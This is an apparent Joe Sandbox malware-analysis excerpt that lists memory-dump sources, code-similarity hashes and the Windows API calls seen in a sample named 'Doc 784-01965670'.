• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
• String ID:
• API String ID: 3240763771-0
• Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
• Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
• Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
• Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
APIs
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
• VariantCopy.OLEAUT32(?,?), ref: 00478259
• VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
• VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CopyVariant$ErrorLast
• String ID:
• API String ID: 2286883814-0
• Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
• Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
• Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
• Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
• WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
• #21.WSOCK32 ref: 004740E0
• WSAGetLastError.WSOCK32(00000000), ref: 004740EB
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
• Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
• Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
• Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
• Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
APIs
• ClientToScreen.USER32(00000000,?), ref: 00441CDE
• GetWindowRect.USER32(?,?), ref: 00441D5A
• PtInRect.USER32(?,?,?), ref: 00441D6F
• MessageBeep.USER32(00000000), ref: 00441DF2
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
• Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
• Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
• Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
• __isleadbyte_l.LIBCMT ref: 004238B2
• MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
• MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
• Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
• Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
• Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
• GetLastError.KERNEL32(?,00000000), ref: 0045D12B
• DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
• Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
• Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
• Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
APIs
• GetParent.USER32(?), ref: 004505BF
• DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
• DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
• DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Proc$Parent
• String ID:
• API String ID: 2351499541-0
• Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
• Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
• Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
• Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
APIs
  • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
• SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
• __itow.LIBCMT ref: 00461461
• __itow.LIBCMT ref: 004614AB
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$__itow$_wcslen
• String ID:
• API String ID: 2875217250-0
• Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
• Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
• Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
• Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
APIs
• GetForegroundWindow.USER32 ref: 00472806
  • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
  • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
  • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
• GetCaretPos.USER32(?), ref: 0047281A
• ClientToScreen.USER32(00000000,?), ref: 00472856
• GetForegroundWindow.USER32 ref: 0047285C
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
• Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
• Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
• Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
APIs
  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
• GetWindowLongW.USER32(?,000000EC), ref: 0047728E
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                    • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                    • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                                    • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                    • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32 ref: 00448CB8
                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                    • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                    • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                                    • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                    • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                                    APIs
                                                                                                                                    • select.WSOCK32 ref: 0045890A
                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458927
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastacceptselect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 385091864-0
                                                                                                                                    • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                    • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                                    • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                    • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                    • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                                    • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                    • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1358664141-0
                                                                                                                                    • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                    • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                                    • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                    • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                    • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                    • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                                    • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                    • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                                    • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                    • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                    • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                                    • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
• Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
APIs
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
• Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
APIs
• __wsplitpath.LIBCMT ref: 00436A45
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• __wsplitpath.LIBCMT ref: 00436A6C
• __wcsicoll.LIBCMT ref: 00436A93
• __wcsicoll.LIBCMT ref: 00436AB0
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
